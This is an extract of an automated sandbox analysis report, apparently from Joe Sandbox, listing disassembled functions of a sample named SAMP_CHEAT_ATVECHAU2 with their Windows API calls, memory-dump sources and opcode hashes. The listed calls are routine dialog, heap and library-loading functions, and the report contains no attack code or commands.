                                                    • SetDlgItemTextW.USER32(00000065,?), ref: 00D0DF03
                                                      • Part of subcall function 00D0B568: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00D0B579
                                                      • Part of subcall function 00D0B568: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00D0B58A
                                                      • Part of subcall function 00D0B568: IsDialogMessageW.USER32(000103DE,?), ref: 00D0B59E
                                                      • Part of subcall function 00D0B568: TranslateMessage.USER32(?), ref: 00D0B5AC
                                                      • Part of subcall function 00D0B568: DispatchMessageW.USER32(?), ref: 00D0B5B6
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1265778266.0000000000CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CF0000, based on PE: true
                                                    • Associated: 00000000.00000002.1265766710.0000000000CF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265807324.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D35000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265863189.0000000000D53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cf0000_SAMP_CHEAT_ATVECHAU2.jbxd
                                                    Similarity
                                                    • API ID: Message$DialogDispatchItemPeekTextTranslate__vswprintf_c_l_swprintf
                                                    • String ID:
                                                    • API String ID: 2718869927-0
                                                    • Opcode ID: 761f70a2f9bb137d952610a77d943d95d5f21daa34bdfd0202fe4c33283d28f7
                                                    • Instruction ID: 1ec60d3fc7c22964f354e05e948d3539c5804a5dca18ad993f7d70b2ab84a4fb
                                                    • Opcode Fuzzy Hash: 761f70a2f9bb137d952610a77d943d95d5f21daa34bdfd0202fe4c33283d28f7
                                                    • Instruction Fuzzy Hash: D2E092B240434C2AEF02AB61DC0AFAE3B6C9B05785F040851B704DB1F3DA79EA509771
                                                    Function 00D0081B Relevance: 3.0, APIs: 2, Instructions: 24libraryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00D00836
                                                    • LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,00CFF2D8,Crypt32.dll,00000000,00CFF35C,?,?,00CFF33E,?,?,?), ref: 00D00858
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1265778266.0000000000CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CF0000, based on PE: true
                                                    • Associated: 00000000.00000002.1265766710.0000000000CF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265807324.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D35000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265863189.0000000000D53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cf0000_SAMP_CHEAT_ATVECHAU2.jbxd
                                                    Similarity
                                                    • API ID: DirectoryLibraryLoadSystem
                                                    • String ID:
                                                    • API String ID: 1175261203-0
                                                    • Opcode ID: 8a3b117300b38d55691061b4602397d0dde67a47b525098753054df1ec12f55b
                                                    • Instruction ID: 914929efd12e8e60436c12243958d41fc79664d10646571994dd5168719c1242
                                                    • Opcode Fuzzy Hash: 8a3b117300b38d55691061b4602397d0dde67a47b525098753054df1ec12f55b
                                                    • Instruction Fuzzy Hash: A6E012765002586ADB11AB94DD05FDA7BACEF09391F0404A57649D2144D674DA848AF4
                                                    Function 00D0A3B9 Relevance: 3.0, APIs: 2, Instructions: 23windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 00D0A3DA
                                                    • GdipCreateBitmapFromStream.GDIPLUS(?,?), ref: 00D0A3E1
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1265778266.0000000000CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CF0000, based on PE: true
                                                    • Associated: 00000000.00000002.1265766710.0000000000CF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265807324.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D35000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265863189.0000000000D53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cf0000_SAMP_CHEAT_ATVECHAU2.jbxd
                                                    Similarity
                                                    • API ID: BitmapCreateFromGdipStream
                                                    • String ID:
                                                    • API String ID: 1918208029-0
                                                    • Opcode ID: 133444bd9719d8086a4ff0d69f83e806d51cc27d9862203f13f0d2b75d8ea5a1
                                                    • Instruction ID: ccf10f2bd6f4f0f56b012786830bc08fec96874915b3604164e516f1f5c9627e
                                                    • Opcode Fuzzy Hash: 133444bd9719d8086a4ff0d69f83e806d51cc27d9862203f13f0d2b75d8ea5a1
                                                    • Instruction Fuzzy Hash: 6CE0ED71501218EBCB10DF99C541799BBF8EB14364F10845AA89A93281E374AE04DBB1
                                                    Function 00D12B8C Relevance: 3.0, APIs: 2, Instructions: 19COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00D12BAA
                                                    • ___vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 00D12BB5
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1265778266.0000000000CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CF0000, based on PE: true
                                                    • Associated: 00000000.00000002.1265766710.0000000000CF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265807324.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D35000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265863189.0000000000D53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cf0000_SAMP_CHEAT_ATVECHAU2.jbxd
                                                    Similarity
                                                    • API ID: Value___vcrt____vcrt_uninitialize_ptd
                                                    • String ID:
                                                    • API String ID: 1660781231-0
                                                    • Opcode ID: 52ab472b0bd7e446f788d44353cb5b5c4ea1870d197c4d38fdb6c02b7b66f409
                                                    • Instruction ID: 97cbb7dbcb55d1411947595650a241d344b819a0b028f2f683343401c9823e19
                                                    • Opcode Fuzzy Hash: 52ab472b0bd7e446f788d44353cb5b5c4ea1870d197c4d38fdb6c02b7b66f409
                                                    • Instruction Fuzzy Hash: 70D0A93429C300384C242AB43E034FA2346EE52BB17A0028AF820868C9EE1390E8A131
                                                    Function 00CF12F1 Relevance: 3.0, APIs: 2, Instructions: 11COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1265778266.0000000000CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CF0000, based on PE: true
                                                    • Associated: 00000000.00000002.1265766710.0000000000CF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265807324.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D35000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265863189.0000000000D53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cf0000_SAMP_CHEAT_ATVECHAU2.jbxd
                                                    Similarity
                                                    • API ID: ItemShowWindow
                                                    • String ID:
                                                    • API String ID: 3351165006-0
                                                    • Opcode ID: 4105d2089b7b3c08b70ebb962b5312f5727f8cbe592f9c646effaafb8879c4ed
                                                    • Instruction ID: 166bac531b0c82e4eda87ef57477b82c87054c9a7934350abe7fca0265a6cb92
                                                    • Opcode Fuzzy Hash: 4105d2089b7b3c08b70ebb962b5312f5727f8cbe592f9c646effaafb8879c4ed
                                                    • Instruction Fuzzy Hash: 80C0123205C700BECB010BB4DC09C2BBBA8ABA5312F04C908B4B5C0260C238C120DB21
                                                    Function 00CF1A04 Relevance: 1.8, APIs: 1, Instructions: 312COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1265778266.0000000000CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CF0000, based on PE: true
                                                    • Associated: 00000000.00000002.1265766710.0000000000CF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265807324.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D35000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265863189.0000000000D53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cf0000_SAMP_CHEAT_ATVECHAU2.jbxd
                                                    Similarity
                                                    • API ID: H_prolog
                                                    • String ID:
                                                    • API String ID: 3519838083-0
                                                    • Opcode ID: 4721bbfccdcb46a2948ffe4fe3198b94c57a96b185b7fa43ba8392c6be6b9a2e
                                                    • Instruction ID: ee837a12983ac2d62a9dce8bba0c27fbd6e2dfa6d3a9e1422bfbd462febc7f9a
                                                    • Opcode Fuzzy Hash: 4721bbfccdcb46a2948ffe4fe3198b94c57a96b185b7fa43ba8392c6be6b9a2e
                                                    • Instruction Fuzzy Hash: ABC1D370A00258DFEF69CF68C494BB97BA5AF15310F0C01B9EE55DB392DB319A44CB62
                                                    Function 00CF3BBA Relevance: 1.7, APIs: 1, Instructions: 177COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1265778266.0000000000CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CF0000, based on PE: true
                                                    • Associated: 00000000.00000002.1265766710.0000000000CF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265807324.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D35000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265863189.0000000000D53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cf0000_SAMP_CHEAT_ATVECHAU2.jbxd
                                                    Similarity
                                                    • API ID: H_prolog
                                                    • String ID:
                                                    • API String ID: 3519838083-0
                                                    • Opcode ID: 4b44bd4aa09ec81e076f9fdc7b7b364fa6ad329536345df334d620d6d1de4b97
                                                    • Instruction ID: 27b30676b3bcc73dbd9fb6aa76524a70be66fe086209f49955ef69895e8d12d7
                                                    • Opcode Fuzzy Hash: 4b44bd4aa09ec81e076f9fdc7b7b364fa6ad329536345df334d620d6d1de4b97
                                                    • Instruction Fuzzy Hash: 6B71C671500B88AEDB75DB70C855AF7B7E9AF14301F40092EE7EB87241DA326684DF22
                                                    Function 00CF8284 Relevance: 1.6, APIs: 1, Instructions: 114COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • __EH_prolog.LIBCMT ref: 00CF8289
                                                      • Part of subcall function 00CF13DC: __EH_prolog.LIBCMT ref: 00CF13E1
                                                      • Part of subcall function 00CFA56D: FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 00CFA598
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1265778266.0000000000CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CF0000, based on PE: true
                                                    • Associated: 00000000.00000002.1265766710.0000000000CF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265807324.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D35000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265863189.0000000000D53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cf0000_SAMP_CHEAT_ATVECHAU2.jbxd
                                                    Similarity
                                                    • API ID: H_prolog$CloseFind
                                                    • String ID:
                                                    • API String ID: 2506663941-0
                                                    • Opcode ID: 0ee5198d158ce972a6b4295b64ffa70237f56223ec732761d4e1c176c2eeebcf
                                                    • Instruction ID: d6cea86c4b9f6e82e65463666bec48d443ba01dea8e508b07adead888a332c10
                                                    • Opcode Fuzzy Hash: 0ee5198d158ce972a6b4295b64ffa70237f56223ec732761d4e1c176c2eeebcf
                                                    • Instruction Fuzzy Hash: 4B41DA7194465C9ADB60DB60CC55BF9B778AF00304F4404EAE25A970A3EB715FCCDB22
                                                    Function 00CF13E1 Relevance: 1.6, APIs: 1, Instructions: 97COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • __EH_prolog.LIBCMT ref: 00CF13E1
                                                      • Part of subcall function 00CF5E37: __EH_prolog.LIBCMT ref: 00CF5E3C
                                                      • Part of subcall function 00CFCE40: __EH_prolog.LIBCMT ref: 00CFCE45
                                                      • Part of subcall function 00CFB505: __EH_prolog.LIBCMT ref: 00CFB50A
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1265778266.0000000000CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CF0000, based on PE: true
                                                    • Associated: 00000000.00000002.1265766710.0000000000CF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265807324.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D35000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265863189.0000000000D53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cf0000_SAMP_CHEAT_ATVECHAU2.jbxd
                                                    Similarity
                                                    • API ID: H_prolog
                                                    • String ID:
                                                    • API String ID: 3519838083-0
                                                    • Opcode ID: 3ab1a5b1c924380383fb42a89ef61bde31aed2d014b794738bb49e5585d54242
                                                    • Instruction ID: 54e77c1202512e4ca5758f5e768253dd9b3f748fe4a97d583da70b445c5e307f
                                                    • Opcode Fuzzy Hash: 3ab1a5b1c924380383fb42a89ef61bde31aed2d014b794738bb49e5585d54242
                                                    • Instruction Fuzzy Hash: 0F4136B0905B459AE724CF798885AE6FBE5BF19300F54492EA6EE83282CB316654CB11
                                                    Function 00CF13DC Relevance: 1.6, APIs: 1, Instructions: 95COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • __EH_prolog.LIBCMT ref: 00CF13E1
                                                      • Part of subcall function 00CF5E37: __EH_prolog.LIBCMT ref: 00CF5E3C
                                                      • Part of subcall function 00CFCE40: __EH_prolog.LIBCMT ref: 00CFCE45
                                                      • Part of subcall function 00CFB505: __EH_prolog.LIBCMT ref: 00CFB50A
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1265778266.0000000000CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CF0000, based on PE: true
                                                    • Associated: 00000000.00000002.1265766710.0000000000CF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265807324.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D35000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265863189.0000000000D53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cf0000_SAMP_CHEAT_ATVECHAU2.jbxd
                                                    Similarity
                                                    • API ID: H_prolog
                                                    • String ID:
                                                    • API String ID: 3519838083-0
                                                    • Opcode ID: 44f4130922dd6dc92076d0378c4f058b15c29a0c1bc2796eae4e50dc74ca008b
                                                    • Instruction ID: 1ee2b26f6422e237451beca39ce5a27859cc7483ba1673abdd5de02b8a55a9b7
                                                    • Opcode Fuzzy Hash: 44f4130922dd6dc92076d0378c4f058b15c29a0c1bc2796eae4e50dc74ca008b
                                                    • Instruction Fuzzy Hash: 474158B0905B449EE724CF798885AE6FBE5FF18300F54492ED6FE83282CB312654CB21
                                                    Function 00D0B093 Relevance: 1.6, APIs: 1, Instructions: 83COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • __EH_prolog.LIBCMT ref: 00D0B098
                                                      • Part of subcall function 00CF13DC: __EH_prolog.LIBCMT ref: 00CF13E1
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1265778266.0000000000CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CF0000, based on PE: true
                                                    • Associated: 00000000.00000002.1265766710.0000000000CF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265807324.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D35000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265863189.0000000000D53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cf0000_SAMP_CHEAT_ATVECHAU2.jbxd
                                                    Similarity
                                                    • API ID: H_prolog
                                                    • String ID:
                                                    • API String ID: 3519838083-0
                                                    • Opcode ID: b3be9da2a854a501da4053a90ef27f702b29ae37b9cefbcdac189b5ecf1ae0b1
                                                    • Instruction ID: 071c4dd1e7e008e583ad67d6a9abaf4d3a58d5fd666abf001925101248b4d706
                                                    • Opcode Fuzzy Hash: b3be9da2a854a501da4053a90ef27f702b29ae37b9cefbcdac189b5ecf1ae0b1
                                                    • Instruction Fuzzy Hash: 59318C71804249EACB14DF64D851AFEBBB4EF09304F14449EE809B3282DB35AE048BB2
                                                    Function 00D1AC98 Relevance: 1.6, APIs: 1, Instructions: 65libraryloaderCOMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    • GetProcAddress.KERNEL32(00000000,00D23A34), ref: 00D1ACF8
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1265778266.0000000000CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CF0000, based on PE: true
                                                    • Associated: 00000000.00000002.1265766710.0000000000CF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265807324.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D35000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265863189.0000000000D53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cf0000_SAMP_CHEAT_ATVECHAU2.jbxd
                                                    Similarity
                                                    • API ID: AddressProc
                                                    • String ID:
                                                    • API String ID: 190572456-0
                                                    • Opcode ID: e4402b9ea23f935c775cb93a9b875a995edf789207e5373db2b895fac5e39319
                                                    • Instruction ID: f0f15f4dee0e92de3bfdee734ae29d71b62effd5827936485d28c8fb5e11d7cd
                                                    • Opcode Fuzzy Hash: e4402b9ea23f935c775cb93a9b875a995edf789207e5373db2b895fac5e39319
                                                    • Instruction Fuzzy Hash: 7B11E777A026257F9B229E1DFC408DA7396EB8432071A4160FC55EB354EE30DC8287F2
                                                    Function 00CF9215 Relevance: 1.6, APIs: 1, Instructions: 53COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1265778266.0000000000CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CF0000, based on PE: true
                                                    • Associated: 00000000.00000002.1265766710.0000000000CF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265807324.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D35000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265863189.0000000000D53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cf0000_SAMP_CHEAT_ATVECHAU2.jbxd
                                                    Similarity
                                                    • API ID: H_prolog
                                                    • String ID:
                                                    • API String ID: 3519838083-0
                                                    • Opcode ID: 90af4bee8c4aa21e408694bc82c3ce5832c0bbcd6bd7a1e4e97ea833f6285f5e
                                                    • Instruction ID: bcfc2b08722824db8af275a566bb4957ebbc61ac7547b2e5cafa5d4c376ea2ac
                                                    • Opcode Fuzzy Hash: 90af4bee8c4aa21e408694bc82c3ce5832c0bbcd6bd7a1e4e97ea833f6285f5e
                                                    • Instruction Fuzzy Hash: 9A01A93390052CABCF51AB68CC41AFEB736FF88750F014515FA16B7251DA34CE04D6A2
                                                    Function 00D13C0D Relevance: 1.5, APIs: 1, Instructions: 34libraryloaderCOMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    • GetProcAddress.KERNEL32(00000000,?), ref: 00D13C3F
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1265778266.0000000000CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CF0000, based on PE: true
                                                    • Associated: 00000000.00000002.1265766710.0000000000CF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265807324.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D35000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265863189.0000000000D53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cf0000_SAMP_CHEAT_ATVECHAU2.jbxd
                                                    Similarity
                                                    • API ID: AddressProc
                                                    • String ID:
                                                    • API String ID: 190572456-0
                                                    • Opcode ID: e82833e6739482b48f6d1f2299920148bc24db5e3310e6b1444f6d5982f7715d
                                                    • Instruction ID: bf26394cb339a3dd538453f3949b8f48aa8d17eb714a74a8959bdf846b340a36
                                                    • Opcode Fuzzy Hash: e82833e6739482b48f6d1f2299920148bc24db5e3310e6b1444f6d5982f7715d
                                                    • Instruction Fuzzy Hash: 07F08C32304316AF8F118EA8FC049DA77AAEB41B617184124FA05E6190EF31DAA0C7F0
                                                    Function 00D18E06 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    • RtlAllocateHeap.NTDLL(00000000,?,00000000,?,00D1CA2C,00000000,?,00D16CBE,?,00000008,?,00D191E0,?,?,?), ref: 00D18E38
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1265778266.0000000000CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CF0000, based on PE: true
                                                    • Associated: 00000000.00000002.1265766710.0000000000CF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265807324.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D35000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265863189.0000000000D53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cf0000_SAMP_CHEAT_ATVECHAU2.jbxd
                                                    Similarity
                                                    • API ID: AllocateHeap
                                                    • String ID:
                                                    • API String ID: 1279760036-0
                                                    • Opcode ID: 11ecba57625ee9f07fcd8f4c5f294556cd81d00279323297e38efe6a1ebc7024
                                                    • Instruction ID: fe0fdd3432c4e7b3a01d32f028554d4f74dcede90db7751ace0ca64a5ba1e1c0
                                                    • Opcode Fuzzy Hash: 11ecba57625ee9f07fcd8f4c5f294556cd81d00279323297e38efe6a1ebc7024
                                                    • Instruction Fuzzy Hash: 7DE06D3120622576EB71A665BC05BDBB649DF427B4F190121BC58D6192CF22CCC1A2F1
                                                    Function 00CF5ABD Relevance: 1.5, APIs: 1, Instructions: 31COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • __EH_prolog.LIBCMT ref: 00CF5AC2
                                                      • Part of subcall function 00CFB505: __EH_prolog.LIBCMT ref: 00CFB50A
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1265778266.0000000000CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CF0000, based on PE: true
                                                    • Associated: 00000000.00000002.1265766710.0000000000CF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265807324.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D35000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265863189.0000000000D53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cf0000_SAMP_CHEAT_ATVECHAU2.jbxd
                                                    Similarity
                                                    • API ID: H_prolog
                                                    • String ID:
                                                    • API String ID: 3519838083-0
                                                    • Opcode ID: 7567109a2cf9e4fba776ee856fd067515e0c59ebdb5709129f8e4669c61d81d2
                                                    • Instruction ID: 0516ce318d41ff53c58b3caf0cb64b3fcbf6ac7079b3dcdf6241bbc2aa09c0fd
                                                    • Opcode Fuzzy Hash: 7567109a2cf9e4fba776ee856fd067515e0c59ebdb5709129f8e4669c61d81d2
